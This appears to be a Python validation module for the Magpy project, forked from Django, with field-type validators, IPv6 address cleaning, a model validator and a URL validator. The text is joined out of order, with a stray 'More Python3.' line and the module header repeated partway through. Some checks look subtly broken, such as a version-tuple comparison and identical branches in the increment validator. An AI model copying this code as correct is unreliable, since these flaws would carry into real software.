class MinLengthValidator(BaseValidator):
"""
Raises a ValidationError with a code of 'min_length'
if the length of value is less than min_length.
"""
compare = lambda self, a, b: a < b
clean = lambda self, x: len(x)
message = u'Ensure this value has at least ' \
u'%(limit_value)d characters (it has %(show_value)d).'
code = 'min_length'
class MaxLengthValidator(BaseValidator):
"""
Raises a ValidationError with a code of 'max_length' if the
length of value is greater than max_length.
"""
compare = lambda self, a, b: a > b
clean = lambda self, x: len(x)
message = u'Ensure this value has at most %(limit_value)d ' \
u'characters (it has %(show_value)d).'
code = 'max_length'
def smart_unicode(stringy_thingy,
encoding='utf-8',
strings_only=False,
errors='strict'):
"""
Returns a unicode object representing 'stringy_thingy'.
Treats bytestrings using the 'encoding' codec.
If strings_only is True, don't convert (some) non-string-like objects.
"""
return force_unicode(stringy_thingy, encoding, strings_only, errors)
def smart_str(stringy_thingy,
encoding='utf-8',
strings_only=False,
errors='strict'):
"""
Returns a bytestring version of 'stringy_thingy',
encoded as specified in 'encoding'.
If strings_only is True, don't convert (some) non-string-like objects.
smart_str is essentially the opposite of smart_unicode().
It forces the first argument to a bytestring.
The strings_only parameter has the same behavior as for
smart_unicode() and force_unicode(). This is slightly different
semantics from Python's builtin str() function,
but the difference can be useful.
"""
if strings_only and isinstance(stringy_thingy, (type(None), int)):
return stringy_thingy
if not isinstance(stringy_thingy, basestring):
try:
return str(stringy_thingy)
except UnicodeEncodeError:
if isinstance(stringy_thingy, Exception):
# An Exception subclass containing non-ASCII data that doesn't
# know how to print itself properly. We shouldn't raise a
# further exception.
return ' '.join([smart_str(arg, encoding, strings_only,
errors) for arg in stringy_thingy])
return unicode(stringy_thingy).encode(encoding, errors)
elif isinstance(stringy_thingy, unicode):
return stringy_thingy.encode(encoding, errors)
elif stringy_thingy and encoding != 'utf-8':
return stringy_thingy.decode('utf-8', errors).encode(encoding, errors)
else:
return stringy_thingy
def is_protected_type(obj):
"""Determine if the object instance is of a protected type.
Objects of protected types are preserved as-is when passed to
force_unicode(strings_only=True).
"""
return isinstance(obj, (
type(None),
int, long,
datetime.datetime, datetime.date, datetime.time,
float, Decimal)
)
class WrappedUnicodeDecodeError(UnicodeDecodeError):
"""UnicodeDecodeError wrapped with the obj."""
def __init__(self, obj, *args):
self.obj = obj
UnicodeDecodeError.__init__(self, *args)
def __str__(self):
original = UnicodeDecodeError.__str__(self)
return '%s. You passed in %r (%s)' % (original, self.obj,
type(self.obj))
def force_unicode(stringy_thingy,
encoding='utf-8',
strings_only=False,
errors='strict'):
"""
Similar to smart_unicode, except that lazy instances are resolved to
strings, rather than kept as lazy objects.
If strings_only is True, don't convert (some) non-string-like objects.
"""
# Handle the common case first, saves 30-40% in performance when s
# is an instance of unicode. This function gets called often in that
# setting.
if isinstance(stringy_thingy, unicode):
return stringy_thingy
if strings_only and is_protected_type(stringy_thingy):
return stringy_thingy
try:
if not isinstance(stringy_thingy, basestring,):
if hasattr(stringy_thingy, '__unicode__'):
stringy_thingy = unicode(stringy_thingy)
else:
try:
stringy_thingy = unicode(str(stringy_thingy),
encoding,
errors)
except UnicodeEncodeError:
if not isinstance(stringy_thingy, Exception):
raise
# If we get to here, the caller has passed in an Exception
# subclass populated with non-ASCII data without special
# handling to display as a string. We need to handle this
# without raising a further exception. We do an
# approximation to what the Exception's standard str()
# output should be.
stringy_thingy = u' '.join([force_unicode(arg,
encoding,
strings_only,
errors) for \
arg in stringy_thingy])
elif not isinstance(stringy_thingy, unicode):
# Note: We use .decode() here, instead of unicode(s, encoding,
# errors), so that if s is a SafeString, it ends up being a
# SafeUnicode at the end.
stringy_thingy = stringy_thingy.decode(encoding, errors)
except UnicodeDecodeError as excptn:
if not isinstance(stringy_thingy, Exception):
raise WrappedUnicodeDecodeError(stringy_thingy, *excptn.args)
else:
# If we get to here, the caller has passed in an Exception
# subclass populated with non-ASCII bytestring data without a
# working unicode method. Try to handle this without raising a
# further exception by individually forcing the exception args
# to unicode.
stringy_thingy = u' '.join([force_unicode(arg,
encoding,
strings_only,
errors) for \
arg in stringy_thingy])
return stringy_thingy
# IP Address support
# This code was mostly based on ipaddr-py
# Copyright 2007 Google Inc. http://code.google.com/p/ipaddr-py/
# Licensed under the Apache License, Version 2.0 (the "License").
def clean_ipv6_address(ip_str, unpack_ipv4=False,
error_message="This is not a valid IPv6 address"):
"""
Cleans a IPv6 address string.
Validity is checked by calling is_valid_ipv6_address() - if an
invalid address is passed, ValidationError is raised.
Replaces the longest continious zero-sequence with "::" and
removes leading zeroes and makes sure all hextets are lowercase.
Args:
ip_str: A valid IPv6 address.
unpack_ipv4: if an IPv4-mapped address is found,
return the plain IPv4 address (default=False).
error_message: A error message for in the ValidationError.
Returns:
A compressed IPv6 address, or the same value
"""
best_doublecolon_start = -1
best_doublecolon_len = 0
doublecolon_start = -1
doublecolon_len = 0
if not is_valid_ipv6_address(ip_str):
raise ValidationError(error_message)
# This algorithm can only handle fully exploded
# IP strings
ip_str = _explode_shorthand_ip_string(ip_str)
ip_str = _sanitize_ipv4_mapping(ip_str)
# If needed, unpack the IPv4 and return straight away
# - no need in running the rest of the algorithm
if unpack_ipv4:
ipv4_unpacked = _unpack_ipv4(ip_str)
if ipv4_unpacked:
return ipv4_unpacked
hextets = ip_str.split(":")
for index in range(len(hextets)):
# Remove leading zeroes
hextets[index] = hextets[index].lstrip('0')
if not hextets[index]:
hextets[index] = '0'
# Determine best hextet to compress
if hextets[index] == '0':
doublecolon_len += 1
if doublecolon_start == -1:
# Start of a sequence of zeros.
doublecolon_start = index
if doublecolon_len > best_doublecolon_len:
# This is the longest sequence of zeros so far.
best_doublecolon_len = doublecolon_len
best_doublecolon_start = doublecolon_start
else:
doublecolon_len = 0
doublecolon_start = -1
# Compress the most suitable hextet
if best_doublecolon_len > 1:
best_doublecolon_end = (best_doublecolon_start +
best_doublecolon_len)
# For zeros at the end of the address.
if best_doublecolon_end == len(hextets):
hextets += ['']
hextets[best_doublecolon_start:best_doublecolon_end] = ['']
# For zeros at the beginning of the address.
if best_doublecolon_start == 0:
hextets = [''] + hextets
result = ":".join(hextets)
return result.lower()
def _sanitize_ipv4_mapping(ip_str):
"""
Sanitize IPv4 mapping in a expanded IPv6 address.
This converts ::ffff:0a0a:0a0a to ::ffff:10.10.10.10.
If there is nothing to sanitize, returns an unchanged
string.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The sanitized output string, if applicable.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
# not an ipv4 mapping
return ip_str
hextets = ip_str.split(':')
if '.' in hextets[-1]:
# already sanitized
return ip_str
ipv4_address = "%d.%d.%d.%d" % (
int(hextets[6][0:2], 16),
int(hextets[6][2:4], 16),
int(hextets[7][0:2], 16),
int(hextets[7][2:4], 16),
)
result = ':'.join(hextets[0:6])
result += ':' + ipv4_address
return result
def _unpack_ipv4(ip_str):
"""
Unpack an IPv4 address that was mapped in a compressed IPv6 address.
This converts 0000:0000:0000:0000:0000:ffff:10.10.10.10 to 10.10.10.10.
If there is nothing to sanitize, returns None.
Args:
ip_str: A string, the expanded IPv6 address.
Returns:
The unpacked IPv4 address, or None if there was nothing to unpack.
"""
if not ip_str.lower().startswith('0000:0000:0000:0000:0000:ffff:'):
return None
hextets = ip_str.split(':')
return hextets[-1]
def is_valid_ipv6_address(ip_str):
"""
Ensure we have a valid IPv6 address.
Args:
ip_str: A string, the IPv6 address.
Returns:
A boolean, True if this is a valid IPv6 address.
"""
# We need to have at least one ':'.
if ':' not in ip_str:
return False
# We can only have one '::' shortener.
if ip_str.count('::') > 1:
return False
# '::' should be encompassed by start, digits or end.
if ':::' in ip_str:
return False
# A single colon can neither start nor end an address.
if ((ip_str.startswith(':') and not ip_str.startswith('::')) or
(ip_str.endswith(':') and not ip_str.endswith('::'))):
return False
# We can never have more than 7 ':' (1::2:3:4:5:6:7:8 is invalid)
if ip_str.count(':') > 7:
return False
# If we have no concatenation, we need to have 8 fields with 7 ':'.
if '::' not in ip_str and ip_str.count(':') != 7:
# We might have an IPv4 mapped address.
if ip_str.count('.') != 3:
return False
ip_str = _explode_shorthand_ip_string(ip_str)
# Now that we have that all squared away, let's check that each of the
# hextets are between 0x0 and 0xFFFF.
for hextet in ip_str.split(':'):
if hextet.count('.') == 3:
# If we have an IPv4 mapped address, the IPv4 portion has to
# be at the end of the IPv6 portion.
if not ip_str.split(':')[-1] == hextet:
return False
try:
validate_ipv4_address(hextet)
except ValidationError:
return False
else:
try:
# a value error here means that we got a bad hextet,
# something like 0xzzzz
if int(hextet, 16) < 0x0 or int(hextet, 16) > 0xFFFF:
return False
except ValueError:
return False
return True
def _explode_shorthand_ip_string(ip_str):
"""
Expand a shortened IPv6 address.
Args:
ip_str: A string, the IPv6 address.
Returns:
A string, the expanded IPv6 address.
"""
if not _is_shorthand_ip(ip_str):
# We've already got a longhand ip_str.
return ip_str
new_ip = []
hextet = ip_str.split('::')
# If there is a ::, we need to expand it with zeroes
# to get to 8 hextets - unless there is a dot in the last hextet,
# meaning we're doing v4-mapping
if '.' in ip_str.split(':')[-1]:
fill_to = 7
else:
fill_to = 8
if len(hextet) > 1:
sep = len(hextet[0].split(':')) + len(hextet[1].split(':'))
new_ip = hextet[0].split(':')
for _ in range(fill_to - sep):
new_ip.append('0000')
new_ip += hextet[1].split(':')
else:
new_ip = ip_str.split(':')
# Now need to make sure every hextet is 4 lower case characters.
# If a hextet is < 4 characters, we've got missing leading 0's.
ret_ip = []
for hextet in new_ip:
ret_ip.append(('0' * (4 - len(hextet)) + hextet).lower())
return ':'.join(ret_ip)
def _is_shorthand_ip(ip_str):
"""Determine if the address is shortened.
Args:
ip_str: A string, the IPv6 address
Returns:
A boolean, True if the address is shortened.
"""
if ip_str.count('::') == 1:
return True
if list(filter(lambda x: len(x) < 4, ip_str.split(':'))):
return True
return False
def validate_bool(data):
"""If the data is True or False."""
if not isinstance(data, bool):
raise ValidationError("Not a bool.")
def validate_long(data):
"""If the data is (or can become) a long
i.e. a 64 bit integer."""
try:
long(data)
except (ValueError, TypeError):
raise ValidationError('Not a long')
def validate_char(data):
"""
A string field, for small-to medium-sized strings.
TODO: this will have to become a method to implement limit.
"""
if not isinstance(data, basestring):
raise ValidationError("%s is not a char." % data)
def validate_date(data):
"""Validate a date."""
if not isinstance(data, datetime.date):
raise ValidationError("Not a date.")
def validate_datetime(data):
"""Validate a datetime."""
if not isinstance(data, datetime.datetime):
raise ValidationError("Not a datetime.")
def validate_decimal(data):
"""Validate a decimal."""
if not isinstance(data, Decimal):
raise ValidationError("Not a decimal.")
def validate_filepath(data):
"""A the moment,
this just checks that it is a string."""
if not isinstance(data, basestring):
raise ValidationError("Not a filepath.")
def validate_float(data):
"""Function to be written here."""
if not isinstance(data, float):
raise ValidationError("Not a float.")
def validate_integer(value):
"""Ensure a value is an integer."""
try:
int(value)
except (ValueError, TypeError):
raise ValidationError('Not an Integer.')
def validate_nullboolean(data):
"""If the data is True or False or None."""
if not isinstance(data, bool):
if not isinstance(data, type(None)):
raise ValidationError("Not a nullboolean.")
def validate_postiveinteger(data):
"""Ensure a value is a postive integer."""
try:
valid_int = int(data)
except (ValueError, TypeError):
raise ValidationError('Not a positive integer.')
else:
if valid_int < 0:
raise ValidationError('Postive integer cannot be negative.')
def validate_smallinteger(data):
"""Integer between -32768 to +32767."""
try:
if not -32768 <= int(data) <= 32767:
raise ValidationError('Not a small integer.')
except (ValueError, TypeError):
raise ValidationError('Not a small integer.')
def validate_biginteger(data):
"""Big (8 byte) integer."""
try:
if not -9223372036854775808 <= int(data) <= 9223372036854775807:
raise ValidationError('Not a big integer.')
except (ValueError, TypeError):
raise ValidationError('Not a big integer.')
def validate_positivesmallinteger(data):
"""Function to be written here."""
try:
if not 0 <= int(data) <= 32767:
raise ValidationError('Not a positive small integer.')
except (ValueError, TypeError):
raise ValidationError('Not a positive small integer.')
def validate_text(data):
"""Text of unlimited size."""
if not isinstance(data, basestring):
raise ValidationError("Not a char.")
def validate_time(data):
"""Validate a time."""
if not isinstance(data, datetime.time):
raise ValidationError("Not a time.")
def validate_url(data):
"""Validates a valid URL."""
urlval = URLValidator()
urlval(data)
def validate_verified_url(data):
"""Validates a valid and existing URL.
Read the warnings above."""
urlval = URLValidator(verify_exists=True)
urlval(data)
def validate_xml(data):
"""See if data is well formed XML.
This is pretty leniant.
It also does not check for validity against a DTD or schema.
"""
parser = xml.parsers.expat.ParserCreate()
try:
parser.Parse(data)
except xml.parsers.expat.ExpatError:
raise ValidationError("Not well formed.")
def validate_dict(data):
"""Very simple check that data is a well format dict."""
try:
data.keys()
except AttributeError:
raise ValidationError('Not an dict.')
def validate_list(data):
"""Check list is a list.
"""
try:
data.insert
except AttributeError:
raise ValidationError('Not a list.')
def validate_file(data):
"""Function to be written here."""
raise NotImplementedError(data)
def validate_image(data):
"""Function to be written here."""
raise NotImplementedError(data)
def validate_embedded(data,
embedded_models,
handle_none=False):
"""Check that embedded data validates."""
try:
model = embedded_models[data['_model']]
except KeyError:
raise ValidationError('Missing _model key on embedded data.')
validate_model_instance(model,
data,
handle_none=handle_none,
embedded_models=embedded_models)
def validate_embedded_list(data,
embedded_models,
handle_none=False):
"""Check that all the embedded data in the list validates."""
try:
data.insert
except AttributeError:
raise ValidationError('Not an embedded list.')
for embedded_model in data:
try:
model = embedded_models[embedded_model['_model']]
except KeyError:
raise ValidationError('Missing _model key on embedded data.')
validate_model_instance(model,
embedded_model,
handle_none=handle_none,
embedded_models=embedded_models)
def validate_set_modifier(model_validator, model, field, field_type, value):
"""Sets field to value. All datatypes are supported with $set."""
model_validator.validate_field(field_type, value)
def validate_unset_modifier(model_validator, model, field, field_type, value):
"""Deletes a given field."""
if not 'required' in model[field]:
raise ValidationError(
'Field %s cannot be unset because it is required.' % field,
code='invalid')
if model[field]['required'] != False:
raise ValidationError(
'Field %s cannot be unset because it is required.' % field,
code='invalid')
def validate_inc_modifier(model_validator, model, field, field_type, value):
"""increments field by the number value if field is present
in the object, otherwise sets field to the number value.
This can also be used to decrement by using a negative value."""
# We need to check that the target can be incremented, and that
#the value is sensible
if not isinstance(value, Number):
raise ValidationError(
'Cannot increment by value '
'%s because it is not a number.' % value,
code='invalid')
if field_type not in (
'BigInteger', 'Decimal', 'Float', 'Integer', 'LongInteger',
'PositiveInteger', 'PositiveSmallInteger', 'SmallInteger'):
raise ValidationError(
'Cannot increment field %s'
'because it is not a numeric type.' % field,
code='invalid')
if field_type in (
'PositiveInteger', 'PositiveSmallInteger'):
model_validator.validate_field(
field_type, abs(value))
else:
model_validator.validate_field(
field_type, abs(value))
def validate_array_modifier(model_validator, model, field, field_type, value):
"""Several modifiers for dealing with lists."""
if field_type not in ('EmbeddedList', 'List'):
raise ValidationError(
'Field %s is not a list type.' % field,
code='invalid')
def validate_rename_modifier(model_validator, model, field, field_type, value):
"""Renames the field with name 'old_field_name' to 'new_field_name'"""
raise ValidationError(
'Rename is currently not supported.',
code='invalid')
def validate_bitwise_modifier(model_validator, model, field, field_type, value):
"""Does a bitwise update of field. Can only be used with integers."""
if field_type not in (
'BigInteger', 'Integer', 'LongInteger',
'PositiveInteger', 'PositiveSmallInteger', 'SmallInteger'):
raise ValidationError(
'Field %s is not an integer type.' % field,
code='invalid')
MODIFICATION_DISPATCHER = {
'$set': validate_set_modifier,
'$unset': validate_unset_modifier,
'$inc': validate_inc_modifier,
'$push': validate_array_modifier,
'$pushAll': validate_array_modifier,
'$addToSet': validate_array_modifier,
'$each': validate_array_modifier,
'$pop': validate_array_modifier,
'$pull': validate_array_modifier,
'$pullAll': validate_array_modifier,
'$rename': validate_rename_modifier,
'$bit': validate_bitwise_modifier
}
DISPATCHER = (
('Boolean', validate_bool),
('BigInteger', validate_biginteger),
('Char', validate_char),
('CommaSeparatedInteger', validate_comma_separated_integer_list),
('Date', validate_date),
('DateTime', validate_datetime),
('Decimal', validate_decimal),
('Dict', validate_dict),
('Email', validate_email),
('Embedded', validate_embedded),
('EmbeddedList', validate_embedded_list),
('File', validate_file),
('FilePath', validate_filepath),
('Float', validate_float),
('Image', validate_image),
('Integer', validate_integer),
('IPAddress', validate_ipv46_address),
('IP4Address', validate_ipv4_address),
('IP6Address', validate_ipv6_address),
('List', validate_list),
('LongInteger', validate_long),
('NullBoolean', validate_nullboolean),
('PositiveInteger', validate_postiveinteger),
('PositiveSmallInteger', validate_positivesmallinteger),
('Slug', validate_slug),
('SmallInteger', validate_smallinteger),
('Text', validate_text),
('Time', validate_time),
('URL', validate_url),
('VerifiedURL', validate_verified_url),
('XML', validate_xml),
)
More Python3.
"""Validation code, much of it originally forked from Django."""
from __future__ import print_function
import six
# Import half of the friggin stdlib :)
import platform
import re
try:
# Python 2
from urllib2 import Request, OpenerDirector, \
HTTPErrorProcessor, UnknownHandler, HTTPHandler, \
HTTPDefaultErrorHandler, FTPHandler, HTTPSHandler
from urllib import quote
from urlparse import urlsplit, urlunsplit
except ImportError:
# Python 3
from urllib.request import Request, OpenerDirector, \
HTTPErrorProcessor, UnknownHandler, HTTPHandler, \
HTTPDefaultErrorHandler, FTPHandler, HTTPSHandler
from urllib.parse import quote, urlsplit, urlunsplit
import operator
import types
import datetime
from decimal import Decimal
import xml.parsers.expat
from numbers import Number
from functools import reduce
def validate_model_instance(model,
instance,
handle_none=False,
embedded_models=None,
callback=None):
"""Validate a single instance.
Required Arguments:
* model - the model definition (dictionary or dictionary-like object)
* instance - the instance (dictionary or dictionary-like object)
Optional Arguments:
* handle_none - set to True to allow None to always be valid data,
default is False. This can be useful in dealing data that came
(at least at one time) from SQL data.
* embedded_models - a dictionary of model definitions, where the key is
the model name, value is the model definition. This dictionary is used
to validate embedded instances.
* callback - an optional callback to run after validation.
"""
model_validator = ModelValidator(model,
handle_none=handle_none,
embedded_models=embedded_models)
if callback:
try:
model_validator.validate_instance(instance)
except ValidationError:
callback(False, instance)
else:
callback(True, instance)
else:
model_validator.validate_instance(instance)
def parse_instance(instance, result_set):
"""Add the models that an instance uses to result_set."""
for key, value in six.iteritems(instance):
if key == '_model':
result_set.add(value)
if isinstance(value, dict):
if '_model' in value:
result_set.add(value['_model'])
parse_instance(value, result_set)
if isinstance(value, list):
for item in value:
if isinstance(item, dict):
parse_instance(item, result_set)
def validate_modification(model,
modification,
handle_none=False,
embedded_models=None,
callback=None):
"""We validate a modification.
This assumes the existing version has already been through validation.
TODO: support embedded instances.
"""
model_validator = ModelValidator(model,
handle_none=handle_none,
embedded_models=embedded_models)
try:
model_validator.validate_modification(model, modification)
except ValidationError:
if callback:
return callback(False, modification)
else:
raise
else:
if callback:
return callback(True, modification)
class ModelValidator(object):
"""Validates instances according to a model."""
def __init__(self,
model,
handle_none=False,
dispatcher=None,
embedded_models=None):
if dispatcher:
self.dispatch = dispatcher
else:
self.dispatch = dict(DISPATCHER)
self.model = model
self.model_keys = set(model.keys())
self.handle_none = handle_none
self.embedded_models = embedded_models
try:
self.model_keys.remove('modeldescription')
except KeyError:
pass
try:
self.model_keys.remove(u'_id')
except KeyError:
pass
try:
self.model_keys.remove('_permissions')
except KeyError:
pass
try:
self.model_keys.remove('_view')
except KeyError:
pass
try:
self.model_keys.remove('_model')
except KeyError:
pass
def do_dispatch(self, field_type, field_data):
"""Do the dispatch."""
if field_type == 'Embedded' or field_type == 'EmbeddedList':
return self.dispatch[field_type](field_data,
self.embedded_models)
self.dispatch[field_type](field_data)
def validate_field(self, field_type, field_data):
"""Validate if the field_data is valid for the field_type."""
try:
self.do_dispatch(field_type, field_data)
except ValidationError:
if field_data is None and self.handle_none:
pass
else:
raise
def validate_instance(self, instance):
"""Validate that the instance meets the requirements of the model."""
instance_keys = set(instance.keys())
try:
instance_keys.remove('_model')
except KeyError:
raise OrphanedInstance('The instance does not have a model key.')
try:
instance_keys.remove('_id')
except KeyError:
pass
try:
instance_keys.remove('_meta')
except KeyError:
pass
try:
instance_keys.remove('_view')
except KeyError:
pass
try:
instance_keys.remove('_versional_comment')
except KeyError:
pass
try:
instance_keys.remove('_operation')
except KeyError:
pass
try:
instance_keys.remove('_permissions')
except KeyError:
pass
# Sanity checks
self.check_for_unknown_fields(instance_keys)
self.check_for_missing_fields(instance_keys)
# Check for valid fields
try:
validity = [self.validate_field(self.model[field]['field'],
instance[field]) for \
field in instance_keys]
except TypeError:
print("Died on %s " % instance['_id'])
print("Perhaps invalid model?")
raise
# If they are all valid, then do nothing
return None
def check_for_unknown_fields(self, instance_keys):
"""Check for nonsense extra fields."""
extra_fields = instance_keys - self.model_keys
if extra_fields:
if len(extra_fields) == 1:
raise InvalidFields(extra_fields.pop())
else:
raise InvalidFields(tuple(extra_fields))
def check_for_missing_fields(self, instance_keys):
"""Some fields are allowed to be missing, others are just AWOL."""
missing_fields = self.model_keys - instance_keys
if missing_fields:
# Some fields are allowed to be missing, others are just AWOL.
awol = set()
for field in missing_fields:
try:
if self.model[field]['required'] == True:
awol.add(field)
except KeyError:
awol.add(field)
if awol:
if len(awol) == 1:
raise MissingFields(awol.pop())
else:
raise MissingFields(tuple(awol))
def validate_modification(self, model, modification):
for modification_name, \
modification_value in six.iteritems(modification):
validator = MODIFICATION_DISPATCHER[modification_name]
for tfield, value in six.iteritems(modification_value):
field, field_type = self.get_field(tfield, model)
validator(self, model, field, field_type, value)
def get_field(self, field, model):
"""If no dots, it is a top level field,
otherwise look through the models for the field."""
if not '.' in field:
return field, model[field]['field']
parts = field.split('.')
field_name = parts.pop(-1)
if field_name == '$':
field_name = parts.pop(-1)
model_name = parts.pop(-1)
if model_name == '$':
model_name = parts.pop(-1)
if model_name in self.embedded_models:
if field_name in self.embedded_models[model_name]:
field = self.embedded_models[model_name][field_name]
elif model_name in model:
real_model_name = model[model_name].get('resource', model_name)
field = self.embedded_models[real_model_name][field_name]
field_type = field['field']
return field, field_type
def get_all_modification_modelnames(model, modification):
"""Get all model names from a modification."""
models = set()
tree = []
for modification_type, field in six.iteritems(modification):
tree.append(field)
for fieldname, fieldvalue in six.iteritems(field):
tree.append(fieldname)
if '.' in fieldname:
parts = fieldname.split('.')
parts = [part for part in parts if part != '$']
for part in parts[:-1]:
tree.append(part)
models.add(part)
real_models = set()
unknown_keys = set()
for model_name in models:
# Maybe it is a top level field
if model_name in model:
real_models.add(model[model_name].get('resource', model_name))
continue
# It is not a top level field
if isinstance(model_name, int):
# It is a positional operator, skip it
continue
# Not sure what it is yet.
unknown_keys.add(model_name)
# Get rid of anything we know about.
# Maybe later we do something else
unknown_keys = unknown_keys - real_models
return list(real_models), list(unknown_keys)
class InvalidInstance(Exception):
"""An instance has not met the requirements of the model.
If you do not care why an instance is invalid, you can
use this superclass and it will catch all subclasses."""
pass
class InvalidFields(InvalidInstance):
"""An instance has a field(s) which is not defined in the model."""
pass
class MissingFields(InvalidInstance):
"""An instance is missing a field(s) which is required by the model."""
pass
class OrphanedInstance(InvalidInstance):
"""An instance is not associated with a class."""
pass
URL_VALIDATOR_USER_AGENT = 'Django (http://www.djangoproject.com/)'
NON_FIELD_ERRORS = '__all__'
class ValidationError(Exception):
"""An error while validating data."""
def __init__(self, message, code=None, params=None):
"""
ValidationError can be passed any object that can be printed (usually
a string), a list of objects or a dictionary.
"""
super(ValidationError, self).__init__(message)
if isinstance(message, dict):
self.message_dict = message
# Reduce each list of messages into a single list.
message = reduce(operator.add, message.values())
if isinstance(message, list):
self.messages = [force_unicode(msg) for msg in message]
else:
self.code = code
self.params = params
message = force_unicode(message)
self.messages = [message]
def __str__(self):
# This is needed because, without a __str__(), printing an exception
# instance would result in this:
# AttributeError: ValidationError instance has no attribute 'args'
# See http://www.python.org/doc/current/tut/node10.html#handling
if hasattr(self, 'message_dict'):
return repr(self.message_dict)
return repr(self.messages)
def __repr__(self):
if hasattr(self, 'message_dict'):
return 'ValidationError(%s)' % repr(self.message_dict)
return 'ValidationError(%s)' % repr(self.messages)
def update_error_dict(self, error_dict):
"""Update the error dict with messages."""
if hasattr(self, 'message_dict'):
if error_dict:
for k, value in self.message_dict.items():
error_dict.setdefault(k, []).extend(value)
else:
error_dict = self.message_dict
else:
error_dict[NON_FIELD_ERRORS] = self.messages
return error_dict
# These values, if given to validate(), will trigger the self.required check.
EMPTY_VALUES = (None, '', [], (), {})
class RegexValidator(object):
"""
A validator is a callable that takes a value and raises a
ValidationError if it doesn't meet some criteria.
Validators can be useful for re-using validation logic
between different types of fields.
Parameters:
regex -- If not None, overrides regex.
Can be a regular expression string or a pre-compiled regular expression.
message -- If not None, overrides message.
code -- If not None, overrides code.
regex
The regular expression pattern to search for the provided value,
or a pre-compiled regular expression.
Raises a ValidationError with message and code if no match is found.
By default, matches any string (including an empty string).
message
The error message used by ValidationError if validation fails.
Defaults to "Enter a valid value".
code
The error code used by ValidationError if validation fails.
Defaults to "invalid".
"""
regex = ''
message = u'Enter a valid value.'
code = 'invalid'
def __init__(self, regex=None, message=None, code=None):
if regex is not None:
self.regex = regex
if message is not None:
self.message = message
if code is not None:
self.code = code
# Quick hack for Python 3
# TODO: replace this
try:
basestring
except NameError:
basestring = (str, bytes)
# Compile the regex if it was not passed pre-compiled.
if isinstance(self.regex, basestring):
self.regex = re.compile(self.regex)
def __call__(self, value):
"""
Validates that the input matches the regular expression.
"""
if not self.regex.search(smart_unicode(value)):
raise ValidationError(self.message, code=self.code)
class URLValidator(RegexValidator):
"""
A RegexValidator that ensures a value looks like a URL
and optionally verifies that the URL actually exists
(i.e., doesn't return a 404 status code).
Raises an error code of 'invalid' if it doesn't look like a URL,
and a code of 'invalid_link' if it doesn't exist.
Parameters:
verify_exists -- Sets verify_exists. Defaults to False.
validator_user_agent -- Sets validator_user_agent.
Defaults to URL_VALIDATOR_USER_AGENT or,
if that setting is set to a null value,
"Django (http://www.djangoproject.com/)".
validator_user_agent
If verify_exists is True, Django uses this value as
the "User-agent" for the request.
verify_exists
If set to True, this validator checks that the URL actually exists
and resolves, by issuing a request to it.
This is really handy, but should only be used for trusted users,
e,g. staff-only mode.
If you allow public-facing code to use this, there is potential for
a denial of service attack.
This option is to be used between consenting adults only!
This problem is particularly pronounced in Python 2.5 and below
since the underlying socket libraries in Python do not have a timeout.
This can manifest as a security problem in three different ways:
1. An attacker can supply a slow-to-respond URL.
Each request will tie up a server process for a period of time;
if the attacker is able to make enough requests,
they can tie up all available server processes.
2. An attacker can supply a URL under his or her control,
and which will simply hold an open connection indefinitely.
Due to the lack of timeout, the Django process attempting to
verify the URL will similarly spin indefinitely.
Repeating this can easily tie up all available server processes.
3. An attacker can supply a URL under his or her control which
not only keeps the connection open, but also sends an unending
stream of random garbage data.
This data will cause the memory usage of the Django process
(which will hold the response in memory) to grow without bound,
thus consuming not only server processes but also server memory.
Note, Python 2.5 is not actually supported by Magpy because of the
Python 3 compatibility.
For Python versions 2.6 and above, which support setting a timeout,
a timeout of ten seconds will be set;
Therefore only use in trusted contexts and where the utility
is sufficient to warrant the potential risks it creates.
"""
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)'
r'+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
def __init__(self, verify_exists=False,
validator_user_agent=URL_VALIDATOR_USER_AGENT):
super(URLValidator, self).__init__()
self.verify_exists = verify_exists
self.user_agent = validator_user_agent
def __call__(self, value):
try:
super(URLValidator, self).__call__(value)
except ValidationError as excptn:
# Trivial case failed. Try for possible IDN domain
if value:
value = smart_unicode(value)
scheme, \
netloc, \
path, \
query, \
fragment = urlsplit(value)
try:
netloc = netloc.encode('idna') # IDN -> ACE
except UnicodeError: # invalid domain part
raise excptn
url = urlunsplit((scheme,
netloc,
path,
query,
fragment))
super(URLValidator, self).__call__(url)
else:
raise
else:
url = value
if self.verify_exists:
import warnings
warnings.warn(
"The URLField verify_exists argument has intractable security "
"and performance issues. Accordingly, it has been deprecated.",
DeprecationWarning
)
headers = {
"Accept": "text/xml,application/xml,application/xhtml+xml,"
"text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Connection": "close",
"User-Agent": self.user_agent,
}
url = url.encode('utf-8')
# Quote characters from the unreserved set, refs #16812
url = quote(url, "!*'();:@&=+$,/?#[]")
broken_error = ValidationError(
u'This URL appears to be a broken link.',
code='invalid_link')
try:
req = Request(url, None, headers)
req.get_method = lambda: 'HEAD'
#Create an opener that does not support local file access
opener = OpenerDirector()
#Don't follow redirects, but don't treat them as errors either
error_nop = lambda *args, **kwargs: True
http_error_processor = HTTPErrorProcessor()
http_error_processor.http_error_301 = error_nop
http_error_processor.http_error_302 = error_nop
http_error_processor.http_error_307 = error_nop
handlers = [UnknownHandler(),
HTTPHandler(),
HTTPDefaultErrorHandler(),
FTPHandler(),
http_error_processor]
try:
import ssl
except ImportError:
# Python isn't compiled with SSL support
pass
else:
handlers.append(HTTPSHandler())
list(map(opener.add_handler, handlers))
if platform.python_version_tuple() >= (2, 6):
opener.open(req, timeout=10)
else:
opener.open(req)
except ValueError:
raise ValidationError(u'Enter a valid URL.', code='invalid')
except: # urllib2.URLError, httplib.InvalidURL, etc.
raise broken_error
class EmailValidator(RegexValidator):
"""
A RegexValidator instance that ensures a value looks like an email address.
"""
def __call__(self, value):
try:
super(EmailValidator, self).__call__(value)
except ValidationError as excptn:
# Trivial case failed. Try for possible IDN domain-part
if value and u'@' in value:
parts = value.split(u'@')
try:
